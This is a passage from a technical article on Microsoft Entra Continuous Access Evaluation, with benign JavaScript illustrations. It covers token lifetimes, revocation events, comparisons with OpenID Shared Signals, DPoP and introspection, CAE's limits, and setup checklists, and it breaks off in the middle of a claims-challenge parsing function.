Microsoft documents the upper bound as "up to 28 hours" for CAE-aware sessions [@ms-cae-concept; @ms-cae-app-resilience]. The default for non-CAE-capable clients remains 1 hour. This is the move that defeats the short-lifetime patch: the IdP load profile collapses because tokens refresh once a day, not on a per-minute cycle, and the revocation window is dramatically smaller -- not because expiry shrank, but because the channel now does the revocation work expiry used to do.
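The trade can be written as two small formulas. In the sketch below, the worst-case exposure for a revoked user is the smaller of the remaining token lifetime and the propagation delay of the revocation channel, and the refresh load is inversely proportional to lifetime. The function names are illustrative; the 60-minute, 28-hour, and 15-minute inputs are the figures cited above.

```javascript
// Worst-case minutes a revoked user's token keeps working.
// Without a revocation channel, only expiry ends the session.
function worstCaseExposureMinutes(lifetimeMinutes, propagationMinutes = Infinity) {
  return Math.min(lifetimeMinutes, propagationMinutes);
}

// Token refreshes one client performs per day.
const dailyRefreshes = (lifetimeMinutes) => (24 * 60) / lifetimeMinutes;

const gen1 = { lifetime: 60, exposure: worstCaseExposureMinutes(60) };
const cae = { lifetime: 28 * 60, exposure: worstCaseExposureMinutes(28 * 60, 15) };

console.log(gen1.exposure, dailyRefreshes(gen1.lifetime)); // 60 24
console.log(cae.exposure, dailyRefreshes(cae.lifetime).toFixed(2)); // 15 0.86
```

Both numbers improve together: the exposure falls from 60 minutes to 15 while each client refreshes less than once a day instead of 24 times. With expiry as the only lever, improving one always worsened the other.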

Key idea: Long-lived access tokens are safe only when paired with a near-real-time revocation channel. CAE is the channel. Subscription provides the push, the claims challenge is the in-band handshake the push enables, and the 28-hour lifetime is what the channel buys -- not what the channel costs.

The full round trip

The three parts interlock. The complete flow, from a state change at Entra to a re-validated request, runs end-to-end through every layer the article has named.

sequenceDiagram
    participant Admin
    participant Entra as Microsoft Entra
    participant Client as Client (MSAL)
    participant RP as Resource Provider (e.g. Exchange Online)
    Admin->>Entra: Disable user account
    Entra->>RP: Push critical-event SET (account disabled)
    Note over RP: Updates cached revocation state for (sub, tenant)
    Client->>RP: GET /me/messages (Authorization Bearer old token)
    Note over RP: Validates JWT signature O(1), checks cached state
    RP-->>Client: 401 plus WWW-Authenticate insufficient_claims
    Note over Client: MSAL parses claims challenge from header
    Client->>Entra: Token request with claims
    Note over Entra: Checks current user state, account is disabled
    Entra-->>Client: 400 invalid_grant or interactive re-auth required
    Note over Client: User cannot recover, session terminates

Three moves, one design. Remove any one and the system collapses. Subscription without a claims challenge gives you push events the RP cannot act on at the wire. Claims challenge without subscription gives you a 401 mechanism with no information to decide when to fire it. Extended lifetime without either gives you Generation 1's fired-employee window. The 28-hour token is not the cost of CAE; it is what CAE purchases.

This is the design. What does it actually do in production today, and where does it stop?

6. CAE as Deployed in Microsoft Entra (2026)

Concrete answers to concrete questions. Which events trigger CAE? Who participates? What is the actual SLA? How long do tokens actually live? No marketing language; only what Microsoft Learn currently documents.

Critical event evaluation

Microsoft Learn lists exactly five events that drive critical event evaluation at the IdP-to-RP boundary [@ms-cae-concept]:

A user account is deleted or disabled.
A password for a user is changed or reset.
Multi-factor authentication is enabled for the user.
An administrator explicitly revokes all refresh tokens for a user.
High user risk is detected by Microsoft Entra ID Protection.

These five events propagate from Entra to the participating CAE-aware resource providers via the push channel. Microsoft's published service-level objective is "up to 15 minutes" for critical-event propagation [@ms-cae-concept]. That is not the same as "instant." The phrase to avoid is "CAE delivers instant revocation"; the accurate phrase is "CAE delivers near-real-time revocation, typically within 15 minutes for critical events."

A separate scenario -- Conditional Access policy evaluation -- covers network and IP-location changes. Here the SLA is different: IP-location enforcement is instant per Microsoft's published documentation [@ms-cae-concept]. The difference is mechanical. IP location is a property the RP sees directly on every request (the source IP of the incoming HTTP connection); the RP can compare it against the location constraints attached to the session and reject locally with no propagation delay. Critical events have to travel from Entra to the RP through the event channel, and that travel has a 15-minute budget at Microsoft 365 scale.
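The local nature of the IP-location check can be sketched as follows. This is a simplified illustration that assumes IPv4 only and a hypothetical list of allowed CIDR ranges attached to the session; real Conditional Access named locations are richer than this, and `checkLocation` is not a Microsoft API.

```javascript
// Convert a dotted-quad IPv4 address to an unsigned 32-bit integer.
function ipv4ToInt(ip) {
  return ip.split('.').reduce((acc, octet) => ((acc << 8) | Number(octet)) >>> 0, 0);
}

// True when `ip` falls inside `cidr` (for example "203.0.113.0/24").
function inCidr(ip, cidr) {
  const [network, prefixText] = cidr.split('/');
  const prefix = Number(prefixText);
  const mask = prefix === 0 ? 0 : (~0 << (32 - prefix)) >>> 0;
  return ((ipv4ToInt(ip) & mask) >>> 0) === ((ipv4ToInt(network) & mask) >>> 0);
}

// Hypothetical per-session constraint: the ranges the policy allowed at sign-in.
// The RP sees sourceIp on every request, so no event has to arrive first.
function checkLocation(sourceIp, allowedRanges) {
  return allowedRanges.some((range) => inCidr(sourceIp, range))
    ? { status: 200 }
    : { status: 401, reason: 'location_outside_allowed_ranges' };
}

console.log(checkLocation('203.0.113.7', ['203.0.113.0/24']).status);  // 200
console.log(checkLocation('198.51.100.9', ['203.0.113.0/24']).status); // 401
```

Everything the check needs is already in the request and the session, which is why this path has no propagation delay to budget for.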

Event	Source	Propagation	Notes
Account deleted or disabled	Entra ID directory	Up to 15 min	Honored by Exchange Online, SharePoint Online, Teams, Graph (CA)
Password changed or reset	Entra ID directory	Up to 15 min	Same RP set
MFA enabled for user	Entra ID directory	Up to 15 min	Same RP set
All refresh tokens revoked (admin)	Entra ID admin action	Up to 15 min	Same RP set
High user risk detected	Entra ID Protection	Up to 15 min	SharePoint Online does not honor user-risk events [@ms-cae-concept]
IP location changed (CA policy)	Resource-provider observation	Instant	Conditional Access policy evaluation path; strict location enforcement [@ms-strict-location-enforcement]

Note: Microsoft Defender for Endpoint and Microsoft Intune (MDM) are signal sources into Conditional Access. They contribute to the risk score and device-compliance state that drive CA policy decisions, but they are not CAE-consuming resource providers. They do not subscribe to Entra critical-event notifications and they do not enforce the claims-challenge handshake on token-bearing requests. The CAE-aware RP set is exactly: Exchange Online, SharePoint Online, Microsoft Teams, and Microsoft Graph (the last only for Conditional Access policy evaluation) [@ms-cae-concept]. If you read older deck slides or vendor blog posts that list MDE or Intune as CAE participants, they are conflating the signal-source role with the resource-provider role.

The SharePoint Online user-risk caveat is a concrete example of why "CAE-aware" is not a binary property at the workload level. SharePoint Online is fully CAE-aware for the first four critical events on the list; it just does not subscribe to user-risk events specifically. The lesson is that you must read the per-workload documentation carefully when designing controls that depend on a specific event's enforcement [@ms-cae-concept].

Workloads that participate

The CAE-aware resource-provider set, per Microsoft Learn [@ms-cae-concept]:

Exchange Online -- full CAE consumer (initial implementation, October 2020).
SharePoint Online -- full CAE consumer, with the user-risk caveat noted above.
Microsoft Teams -- full CAE consumer (initial implementation), per Alex Simons's January 2022 GA announcement [@simons-2022-01-ga-rss].
Microsoft Graph -- consumes Conditional Access policy evaluation events (the IP-location instant path); narrower scope than the M365 productivity workloads.

Client-side support is also explicit. Microsoft's compatibility tables in the CAE concept page enumerate which client and server combinations are Supported, Partially supported, or Not Supported on every major operating system and form factor [@ms-cae-concept]. Office web apps against SharePoint Online and Exchange Online are documented as Not Supported on several combinations; every Teams client surface shows as Partially supported. The point is not that CAE is broken on these surfaces -- it is that Microsoft documents the rough edges in primary source, and tenant administrators who care about specific scenarios must read the table.

Tokens and clients

The default access-token lifetime for CAE-aware sessions is up to 28 hours; the default for non-CAE-capable clients remains 1 hour [@ms-cae-concept; @ms-cae-app-resilience]. Client support requires a current Microsoft Authentication Library (MSAL) release on the target platform: the 4.x line for .NET and JavaScript; the appropriate current line for Python, Java, Android, iOS, or macOS, per each SDK's own release stream. Microsoft Learn's Use Continuous Access Evaluation enabled APIs page enumerates per-SDK guidance [@ms-cae-app-resilience]. The app registration must also declare the xms_cc client capability with value ["cp1"] to advertise CAE-handling support to the IdP [@ms-cae-app-resilience].

xms_cc (client capability): An app-registration claim by which a client advertises support for CAE-aware token issuance. The canonical wire-level value in the issued JWT is lowercase `"cp1"` (Microsoft's developer docs show both `"cp1"` and `"CP1"`; negotiation is case-insensitive but the token claim is lowercase). It signals that the client's MSAL implementation can decode and act on a `WWW-Authenticate: Bearer error="insufficient_claims"` response by parsing the `claims` parameter and re-acquiring a token. Without it, Entra issues the default 1-hour token and the resource provider falls back to standard expiry [@ms-cae-app-resilience].

Resource provider (CAE sense): A Microsoft 365 workload (Exchange Online, SharePoint Online, Teams, or Microsoft Graph for Conditional Access policy) that consumes Entra's critical-event notifications and enforces them on subsequent token-bearing requests via the claims-challenge handshake. This is a narrower meaning than the generic OAuth 2.0 sense of "resource server"; in CAE, "resource provider" specifically means a workload that has implemented the CAE participation contract with Entra [@ms-cae-concept].

Microsoft documents an *upper bound* on token lifetime. The actual lifetime issued for any given session is variable and can be shorter. CAE-aware sessions can also be refreshed silently as long as the channel signals nothing has changed. Practically, this means most users with CAE-aware clients on M365 productivity workloads almost never see an interactive re-authentication prompt during normal working hours [@ms-cae-concept].
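On the client side, MSAL.js expresses this capability through the `clientCapabilities` option in its auth configuration. The sketch below shows only the configuration object; the client ID and authority are placeholders, and the final check is an illustrative helper rather than anything MSAL requires.

```javascript
// Sketch of an MSAL.js configuration object. clientId and authority are
// placeholders; clientCapabilities is the option that advertises
// claims-challenge handling to Entra.
const msalConfig = {
  auth: {
    clientId: '11111111-2222-3333-4444-555555555555',              // placeholder
    authority: 'https://login.microsoftonline.com/your-tenant-id', // placeholder
    clientCapabilities: ['CP1'],
  },
};

// In an application this object would be handed to the MSAL client
// constructor (for example PublicClientApplication in @azure/msal-browser).
// Here we only confirm the capability is present, ignoring case.
const advertisesCae = msalConfig.auth.clientCapabilities
  .some((capability) => capability.toLowerCase() === 'cp1');

console.log('advertises CAE support:', advertisesCae); // advertises CAE support: true
```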

A migration note for older tenants

Tenant administrators with Conditional Access policies that pre-date GA may carry legacy "strict location enforcement" preview settings. Microsoft has since migrated the feature into GA, and the current Microsoft Learn page Strictly enforce location policies using continuous access evaluation documents the post-migration configuration model [@ms-strict-location-enforcement]. Administrators should verify their policies after each major Conditional Access feature wave to ensure preview-to-GA migrations have been picked up.

CAE is one approach among several. Where does it sit relative to introspection-per-request, identity-aware proxies, DPoP, and the cross-vendor OpenID standard? The design space is small enough to map cleanly.

7. Competing Approaches and Their Relation to CAE

Five named methods occupy adjacent positions in the design space. Some compete; some compose. The map matters because deployments that confuse the two get wrong answers.

CAE versus OpenID SSF and CAEP 1.0

Same architecture, different implementations. Microsoft CAE solves the Microsoft estate via a Microsoft-internal protocol; OpenID SSF and CAEP solve the cross-vendor SaaS long tail via a public standard atop RFC 8417 [@openid-three-final-specs; @openid-ssf-1_0-final; @openid-caep-1_0]. The two are convergent rather than rivalrous: Microsoft is moving toward also acting as an SSF transmitter and receiver alongside its first-party CAE protocol, and other vendors are building SSF receivers that can consume signals from any transmitter, including Microsoft.

The Authenticate 2025 interop event in October 2025 was the first whose tested text was the Final-Specification version of SSF [@openid-authenticate-2025-interop]. Multi-vendor SSF and CAEP interoperability has been demonstrated at successive Gartner IAM Summit interop events as well. At the March 2024 London summit, SGNL's CAEP Hub interoperated as both transmitter and receiver with Cisco Duo, Okta, SailPoint, and Helisoft on the session-revoked CAEP event [@sgnl-2024-04-interop]. Okta's own blog characterizes the March 2025 London summit as "a significant industry shift toward interconnected, real-time security" with "interoperable implementations from pioneers like Okta, Google, IBM, Omnissa, SailPoint, and Thales" [@okta-shared-signals].

Tim Cappalli, who joined Okta after his time at Microsoft, co-chairs the OpenID Shared Signals Working Group alongside Atul Tulshibagwale (SGNL, formerly Google) [@tulshibagwale-sgnl-2023-08-qanda; @openid-sharedsignals-wg]. The cross-vendor co-chair arrangement is part of why the Final Specifications passed without significant vendor pushback: the people doing the standardization had visibility into both Microsoft's and Google's prior implementations.

CAE versus RFC 7662 introspection

Parallel paths, not competitors. RFC 7662 introspection [@rfc-7662] continues to be the right answer for opaque-token systems and on-premises IdPs where the AS-to-RP per-request round-trip is acceptable. CAE wins at hyperscale public-cloud volumes specifically because it inverts the per-request dependency: state pushes to the RP once and lives in cache; the data plane does not consult the AS on every request. If you are building a B2B integration with a small RP count and a few hundred requests per second, RFC 7662 is fine. If you are building Exchange Online, it is not.
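The inversion is easiest to see as arithmetic. The numbers below are purely illustrative assumptions, not measurements: a modest 300 requests per second, a hypothetical 1,000 critical events per day, and a hypothetical fan-out of four resource providers.

```javascript
// Illustrative numbers only; none of these are measurements.
const requestsPerSecond = 300;      // "a few hundred requests per second"
const secondsPerDay = 86400;
const criticalEventsPerDay = 1000;  // hypothetical event volume
const resourceProviders = 4;        // hypothetical fan-out per event

// Introspection: one authorization-server round trip per data-plane request.
const introspectionCallsPerDay = requestsPerSecond * secondsPerDay;

// Push: one delivery per event per subscribed RP, independent of request volume.
const pushDeliveriesPerDay = criticalEventsPerDay * resourceProviders;

console.log(introspectionCallsPerDay); // 25920000
console.log(pushDeliveriesPerDay);     // 4000
```

Introspection cost grows with traffic; push cost grows with the number of state changes. At small request volumes the difference does not matter, which is why RFC 7662 stays a sensible choice there.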

CAE versus DPoP and mTLS-bound tokens

Complementary, not competitive. The threat model for CAE is stale authorization: the authorization decision at sign-in is no longer accurate, because the user has been disabled, their password has been reset, their risk score has changed, or their network location has shifted. The threat model for proof-of-possession is stolen tokens: an attacker holding a bearer token that was legitimately issued to a different party.

RFC 9449, OAuth 2.0 Demonstrating Proof of Possession (DPoP), published September 2023 by Daniel Fett and collaborators [@rfc-9449-dpop], binds an access token to a client-held key pair: a DPoP-bound token can only be replayed by an attacker who also stole the private key. RFC 8705, OAuth 2.0 Mutual-TLS Client Authentication and Certificate-Bound Access Tokens, published February 2020 by Brian Campbell and collaborators [@rfc-8705-mtls], does the same thing using mTLS certificates. Both are sender-constrained-token mechanisms; both close the bearer-token-replay attack surface.

CAE does not address token theft. A stolen CAE-aware token is still usable by the attacker until the IdP or RP becomes aware of the compromise. A DPoP-bound CAE-aware token closes both gaps: the attacker cannot replay it, and even if they could, the channel can revoke it within minutes. The correct deployment pattern is to combine CAE with DPoP or mTLS-binding where the application threat model warrants both.

CAE versus BeyondCorp-style identity-aware proxies

Different architectural layer. Identity-aware proxies (Google IAP, Cloudflare Access, AWS Verified Access) sit in front of the resource server and enforce policy at the proxy. They have full visibility into per-request state and can do instant revocation by terminating the connection at the proxy when policy changes. This is correct for proxy-fronted workloads but does not scale to the long tail of API surfaces that cannot or will not sit behind a proxy. CAE pushes the enforcement into the resource server itself, which is what lets it work for native cloud APIs and federated SaaS where the proxy model would not.

A note on PRT theft

CAE does not address attacks at the Primary Refresh Token (PRT) layer. The PRT is a long-lived refresh credential Windows uses to mint access tokens silently from a logged-in session. A stolen PRT can mint CAE-aware access tokens that are, from Entra's perspective, legitimately issued -- the attacker holds a credential the IdP still recognizes. CAE will only catch this if the user is revoked, the password is reset, or one of the other critical events fires after the PRT theft. The Pass-the-PRT attack class therefore bypasses CAE entirely; defenses for that layer are out of scope here and are a separate engineering problem.

Mapping the design space

The table is the cleanest way to see who competes with whom and who composes with whom.

Approach	Solves	Composes with CAE	Competes with CAE
OpenID SSF/CAEP 1.0	Cross-vendor revocation	Yes (CAE is a Microsoft implementation of the same pattern)	No
RFC 7662 introspection	Opaque-token revocation at modest scale	Parallel path	At hyperscale only
DPoP (RFC 9449)	Sender-constrained tokens	Yes (compose for full coverage)	No
mTLS-bound tokens (RFC 8705)	Sender-constrained tokens	Yes (compose for full coverage)	No
Identity-aware proxy	Per-request policy at the proxy edge	Composes for proxy-fronted workloads	Different layer
Short access-token lifetime	Reduces revocation window mechanically	Falls back when CAE not available	Yes, and loses on the trade

The reader who came to this article expecting a binary contest -- "which one wins?" -- has the wrong frame. The actual answer is that CAE is one move in a layered defense, and most production deployments will end up composing it with DPoP or mTLS for token binding, falling back to short lifetimes for non-CAE clients, and continuing to use introspection for opaque-token internal APIs.

That maps the neighbors. But every architecture has limits, and the next section is the humility beat where the descent begins.

8. Theoretical Limits: What CAE Cannot Do

Every architecture has a floor. The reader has spent six sections climbing; this is where the limits show up -- not as vendor laziness, but as physics, scale, and trust topology.

Limit 1: cannot revoke a token already in flight

Once a request has been accepted and is being served by the resource provider, CAE cannot reach into the RP's execution thread and abort it. The revocation applies to the next request. A long-running operation -- a bulk Outlook export, a large SharePoint upload -- that began at 10:23:00 may complete normally even if the user is disabled at 10:23:01. The revocation takes effect the next time the client presents the token [@ms-cae-concept]. For most use cases the in-flight window is sub-second and the consequence is negligible; for long-running data egress, it matters.

Limit 2: cannot beat the 15-minute critical-event SLA for most events

Microsoft's published SLA is "up to 15 minutes" for critical-event propagation [@ms-cae-concept]. Only IP-location enforcement is instant. The 15-minute number is not a fundamental limit; it is engineering economics at hyperscale. Fanning out an event to every CAE-aware RP for every potentially affected subject across Microsoft 365's global infrastructure is what produces the budget. Smaller-scale deployments demonstrate much better numbers: TigerIdentity's commercial deployment self-reports sub-second end-to-end revocation in a tuned CAEP receiver configuration [@tigeridentity-caep-explained]. The architecture allows sub-second; Microsoft's particular deployment chooses 15 minutes because the alternative at its fan-out scale is prohibitively expensive.

The strict physical floor sits below even the tuned implementations. An RP cannot enforce a revocation it has not yet learned about. The one-way network latency $L$ between IdP and RP sets the absolute minimum: with a transcontinental $L \approx 70\,\text{ms}$, no push protocol can revoke faster than that, and pull protocols are necessarily worse. In practice, queuing, scheduling, and event-fanout dominate $L$ at scale -- but the floor remains.
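The floor can be written down under simple assumptions. Let $T$ be the delay between an event occurring at the IdP and the RP learning of it, and let $L$ be the one-way latency. For the pull case, assume (hypothetically) that polls arrive at the IdP every $P$ seconds and that the event time is uniformly distributed within a polling interval; $P$ is an illustrative symbol, not something the specifications define.

```latex
% Push: the event must at least cross the network once.
T_{\text{push}} \ge L

% Pull: wait for the next poll to arrive (between 0 and P), then one-way
% latency for the response to come back.
L \le T_{\text{pull}} \le P + L,
\qquad
\mathbb{E}\left[T_{\text{pull}}\right] = \frac{P}{2} + L

% Example with L = 0.07 s and an assumed P = 60 s:
\mathbb{E}\left[T_{\text{pull}}\right] = 30 + 0.07 = 30.07\ \text{s}
```

Under these assumptions pull matches push only in the best case and is worse on average by half the polling interval.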

Key idea: The 15-minute SLA is not a fundamental limit; it is engineering economics at hyperscale. Sub-second is feasible at smaller fan-outs, and is the direction of travel as receiver implementations improve and as Microsoft's own event-distribution infrastructure matures. But the strict physical floor is the network latency between IdP and RP; no cooperative protocol can do better than that.

Limit 3: cannot cover non-CAE-aware clients or resource providers

CAE is a cooperative protocol. Both the client (via the xms_cc=cp1 capability declaration) and the resource provider (via implementing the participation contract) must be CAE-aware [@ms-cae-app-resilience]. A non-CAE client receives a default 1-hour token and never sees a claims challenge; it relies on standard expiry. A non-CAE RP silently falls back to standard token expiry as well; the IdP's events have no consumer. The CAE-aware portion of the estate enjoys the new contract; the rest carries the old security debt unchanged.

This is why audit posture matters. A tenant administrator who wants to argue that revocation latency for their workforce is "under 15 minutes" must be able to demonstrate that the client and RP combinations the workforce actually uses are CAE-aware. Microsoft's compatibility tables [@ms-cae-concept] document several Office-web-app and OneDrive-Win32-versus-SharePoint combinations as Not Supported or Partially supported; those gaps are part of the tenant's effective revocation profile, not someone else's problem.
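One way to make that audit concrete is to compute the worst case across the combinations actually in use. The sketch below is a simplification: the inventory entries are hypothetical, "Partially supported" combinations are not modeled, and the two constants are the published upper-bound and default figures cited above.

```javascript
const CAE_CRITICAL_EVENT_MINUTES = 15;     // published "up to" figure
const DEFAULT_TOKEN_LIFETIME_MINUTES = 60; // default lifetime without CAE

// Worst-case minutes between a critical event and enforcement for one
// client/RP pairing. Both sides must be CAE-aware for the channel to apply.
function worstCaseRevocationMinutes({ clientCaeAware, rpCaeAware }) {
  return clientCaeAware && rpCaeAware
    ? CAE_CRITICAL_EVENT_MINUTES
    : DEFAULT_TOKEN_LIFETIME_MINUTES;
}

// Hypothetical inventory of the combinations a workforce actually uses.
const inventory = [
  { name: 'desktop mail client -> Exchange Online', clientCaeAware: true, rpCaeAware: true },
  { name: 'legacy script -> custom API', clientCaeAware: false, rpCaeAware: false },
  { name: 'current MSAL app -> custom API', clientCaeAware: true, rpCaeAware: false },
];

// The defensible tenant-wide claim is the maximum across the inventory.
const tenantWorstCase = Math.max(...inventory.map(worstCaseRevocationMinutes));
console.log(tenantWorstCase); // 60
```

A single non-participating combination sets the tenant-wide number, which is why the inventory has to reflect real usage rather than the best-supported client.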

Limit 4: cannot help if the resource provider itself is compromised

Revocation state lives at the RP. A compromised RP can simply ignore revocation events: keep serving requests against tokens Entra has signaled are invalid; misreport its own subscription state; drop events on the floor. CAE is a cooperative protocol between trustworthy parties. It is not a defense against an RP that has been pwned. The OpenID SSF specification addresses this implicitly by defining receiver requirements (verification events, stream-control endpoints, signature verification on SETs), but no receiver requirement can compel a compromised receiver to obey the protocol.

The threat model implication: an attacker who has compromised an RP does not need to bypass CAE. They simply do not implement it from the inside, and the protocol's design has no remedy. RP integrity is a prerequisite, not a guarantee.

Limit 5: cannot revoke a stolen PRT before it mints a new access token

As noted in Section 7, the Primary Refresh Token sits outside CAE's scope. A stolen PRT mints new CAE-aware access tokens that Entra treats as legitimately issued, because from Entra's perspective they are legitimately issued -- the attacker is presenting a credential the IdP recognizes. CAE catches PRT theft only when one of the five critical events fires after the theft. If the attacker exfiltrates a PRT, refreshes a token, and immediately uses it, the access token is valid and the revocation channel has nothing to revoke.

The SharePoint Online user-risk-event caveat is a useful concrete example of the per-feature limit pattern. Even within the four CAE-consuming RPs, feature support is not uniform; you cannot reason about CAE as a single boolean property at the workload level. Every event you care about must be checked against the specific RP that will enforce it [@ms-cae-concept].

The bounded design space

Put together, the five limits draw the perimeter of what CAE can do. It cannot stop in-flight requests. It cannot beat network latency at the strict floor or 15 minutes at Microsoft's chosen operating point. It cannot help non-participating clients or RPs. It cannot fix a compromised RP. It cannot revoke PRT-layer credentials before they mint new tokens. The honest summary is that the design space is bounded -- the reader who internalizes the five limits has a calibrated sense of what is fundamentally possible, and can stop expecting CAE to be a single fix for revocation in all situations.

The limits also map the open frontier. If those are the structural constraints, what are the OpenID Foundation and the SaaS long tail working on in 2026?

9. Open Problems (2026)

Final Specifications are necessary but not sufficient. CAEP 1.0, SSF 1.0, and RISC 1.0 were approved on September 2, 2025 [@openid-three-final-specs]. The question for 2026 is what adoption and extension look like. Five live problems.

1. Third-party SaaS receiver-adoption depth

The Final Specifications give every SaaS vendor a clean target to build against. The question is whether they will. Google Workspace shipped its SSF receiver in Closed Beta, supporting only the session-revoked CAEP event at launch [@google-workspace-ssf-api]. That is one event out of CAEP 1.0's eight. The SaaS long tail -- Workday, ServiceNow, GitHub Enterprise, Atlassian, Salesforce -- has not, as of mid-2026 (roughly nine months after the Final Specifications were approved), shipped public receivers.

For the "fired employee with N SaaS apps" scenario to be fully solved, every SaaS app in the user's bundle has to be a CAEP receiver subscribed to events from the enterprise IdP. The architecture is in place; the integration work is per-vendor and per-customer. This is the largest single determinant of CAE's real-world value over the next several years.

Note: The Microsoft 365 estate enjoys near-complete CAE coverage because Microsoft built both the IdP and the resource providers. The cross-vendor story is fundamentally a coordination problem: every receiver has to be built, deployed, and configured to subscribe to events from every transmitter the enterprise uses. SSF 1.0 makes the integration tractable; it does not make the work disappear. Watch receiver coverage in 2026-2028 as the leading indicator of CAE's industry-wide impact.

2. CAE for non-human and agent identities

CAEP subject identifiers assume user-shaped or device-shaped subjects [@openid-caep-1_0]. Workload identities, service principals, and emerging AI-agent identities sit outside the model as currently profiled. An agent acting on behalf of a user, with its own identity and its own session, is not yet covered by a Final-Specification profile. The Microsoft Entra Conditional Access for Agent Identities workstream is a documented Microsoft Learn surface as of 2026 [@ms-conditional-access-agent-id] and is one of the workstreams that will eventually produce a CAEP profile for non-human subjects, but as of mid-2026 the cross-vendor standardization gap is open.

3. Cross-IdP federation of SSF streams

When tenant A federates to tenant B, the event-flow path crosses a trust boundary the current Final Specifications do not explicitly profile. If a user is disabled in tenant A's IdP, how does the revocation event reach the resource providers downstream in tenant B? The pieces -- transmitter, receiver, SET envelope, signed events -- are all in place; what is missing is the canonical profile for cross-IdP federation of SSF streams. This is a 2026-2027 OpenID Foundation workstream rather than a Final-Specification gap.

4. Bidirectional signal sharing

Today's CAE and CAEP deployments are largely IdP-as-transmitter, RP-as-receiver. The full vision is bidirectional: an RP that detects anomalous behavior (unusual access patterns, suspected automation, post-authentication risk signals) should be able to transmit those signals back to the IdP, which can then incorporate them into the next authorization decision. SGNL and similar vendors are building toward this model. The Final Specifications support bidirectional flow at the protocol level; the policy and operational pieces -- who trusts whom, what events flow which way, how an IdP weighs signals from an RP -- are still being worked out.

5. Reason-code convergence between CAEP and RISC

CAEP 1.0 and RISC 1.0 cover overlapping ground around credential mutation. CAEP defines a credential-change event; RISC defines account-credential-change-required [@openid-caep-1_0; @openid-sharedsignals-wg]. Implementers must choose, and vendor extensions proliferate where the spec leaves room. Reason-code convergence between the two profiles is incomplete; some receivers will subscribe to both streams to be safe, others will pick one and hope upstream transmitters agree. Over time the WG will likely consolidate; for 2026, the practical guidance is to support both event vocabularies in receiver code.
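Supporting both vocabularies can be as small as a lookup table that normalizes the two event types to internal reason codes. The sketch below assumes the SET has already been signature-verified and decoded; the internal codes (`CREDENTIAL_CHANGED`, `CREDENTIAL_CHANGE_REQUIRED`) and the `dispatch` function are hypothetical names chosen for illustration.

```javascript
// Event-type URIs from the CAEP and RISC profiles.
const CAEP_CREDENTIAL_CHANGE =
  'https://schemas.openid.net/secevent/caep/event-type/credential-change';
const RISC_CREDENTIAL_CHANGE_REQUIRED =
  'https://schemas.openid.net/secevent/risc/event-type/account-credential-change-required';

// Hypothetical internal reason codes; a real receiver would define its own.
const reasonCodes = {
  [CAEP_CREDENTIAL_CHANGE]: 'CREDENTIAL_CHANGED',
  [RISC_CREDENTIAL_CHANGE_REQUIRED]: 'CREDENTIAL_CHANGE_REQUIRED',
};

// `setPayload` is the decoded body of a SET whose signature was verified
// elsewhere. Unknown event types are reported rather than dropped silently.
function dispatch(setPayload) {
  return Object.keys(setPayload.events || {})
    .map((eventType) => reasonCodes[eventType] || 'ignored');
}

const sample = {
  iss: 'https://idp.example.com',
  events: {
    [CAEP_CREDENTIAL_CHANGE]: { credential_type: 'password', change_type: 'update' },
    'https://example.com/unknown-event': {},
  },
};
console.log(dispatch(sample)); // [ 'CREDENTIAL_CHANGED', 'ignored' ]
```

Keeping the mapping in one table means a later consolidation by the working group would change data rather than control flow.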

The first interoperability event whose tested text was the Final-Specification version of SSF took place at Authenticate 2025 in San Diego, October 13-15, 2025, hosted by the FIDO Alliance and coordinated by the OpenID Foundation Shared Signals Working Group [@openid-authenticate-2025-interop]. The event required that all participants with an SSF Transmitter pass the OpenID Foundation's free, open-source conformance tests. This was the fourth in a series of Gartner-IAM and Authenticate interops since March 2024, and the first conducted after SSF 1.0 was approved Final on September 2, 2025. The list of vendor participants has grown at each event; cross-vendor receiver coverage is the metric to watch.

Given all this -- the architecture, the limits, the open frontier -- what should you actually do this week in your tenant and your code?

10. Turning CAE On in Your Tenant and Your Code

Three audiences, three checklists. Each section is what an engineer in that role needs to confirm or change to make CAE work in their environment.

For the tenant administrator

CAE has been auto-enabled by default for new Microsoft Entra tenants since the January 2022 GA [@simons-2022-01-ga-rss]. Tenants created before then may need to verify enablement in Conditional Access -> Session controls -> Customize continuous access evaluation. The relevant signals to check:

CAE enablement state. Confirm that the tenant-wide CAE policy is set to Enabled rather than Disabled or Strict location.
Per-policy disable flags. Some legacy CA policies carry per-policy CAE overrides. Audit any that explicitly disable CAE; the right default is to honor it.
Strict location enforcement migration. Tenants with pre-GA "strict location enforcement" preview settings should verify that the policy has migrated to the current GA configuration model documented in Microsoft Learn [@ms-strict-location-enforcement].
Audit log baselines. Sign-in logs surface signInEventTypes with CAE-related entries; refresh-token issuance events and revocation events appear in the Entra ID audit log. Build a baseline before changing policies so you can detect drift.

For the MSAL client developer

The client side has three things to confirm and one thing to test:

MSAL version. Use a current MSAL release on your client platform: 4.x for MSAL.NET and MSAL.js; the appropriate current line for MSAL Python, MSAL Java, MSAL Android, and MSAL for iOS/macOS, per each SDK's own release stream. Microsoft Learn's Use Continuous Access Evaluation enabled APIs page enumerates the per-SDK guidance [@ms-cae-app-resilience]. Earlier major-version lines do not handle the claims challenge transparently.
Capability declaration. The app registration must declare xms_cc with value ["cp1"] (lowercase is the canonical token-claim form; uppercase "CP1" also works because negotiation is case-insensitive). This is the wire-level signal to Entra that the client can handle a CAE-aware token and the claims challenge that comes with it.
Claims-challenge handling. MSAL helpers do this transparently in current SDK versions, but custom HTTP pipelines that bypass MSAL must implement the WWW-Authenticate: Bearer error="insufficient_claims" response handler manually. Decode the claims parameter (base64url), pass it to AcquireTokenInteractive or the equivalent, and retry the original request with the new token.
End-to-end test. Trigger an admin password reset against a test user in a non-production tenant and verify that the next API call from a signed-in MSAL session surfaces the claims challenge and recovers cleanly. This is the single most useful confidence test; it exercises every layer of the protocol in one round trip.
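For a custom HTTP pipeline, the manual claims-challenge step in the checklist above might look roughly like this. It is a sketch under assumptions: the function names are illustrative, the header parsing covers only simple `key="value"` parameters, and the sample header is built locally so the example is self-contained.

```javascript
// Parse key="value" pairs out of a WWW-Authenticate header value.
function parseChallenge(headerValue) {
  const params = {};
  for (const [, key, value] of headerValue.matchAll(/(\w+)="([^"]*)"/g)) {
    params[key] = value;
  }
  return params;
}

// Decode the claims parameter, tolerating both base64 and base64url alphabets.
function decodeClaims(encoded) {
  const base64 = encoded.replace(/-/g, '+').replace(/_/g, '/');
  const padded = base64 + '='.repeat((4 - (base64.length % 4)) % 4);
  return JSON.parse(atob(padded));
}

// Returns the decoded claims object when the response is a CAE claims
// challenge, or null when it is an ordinary 401 or a non-401 response.
function extractClaimsChallenge(status, wwwAuthenticate) {
  if (status !== 401 || !wwwAuthenticate) return null;
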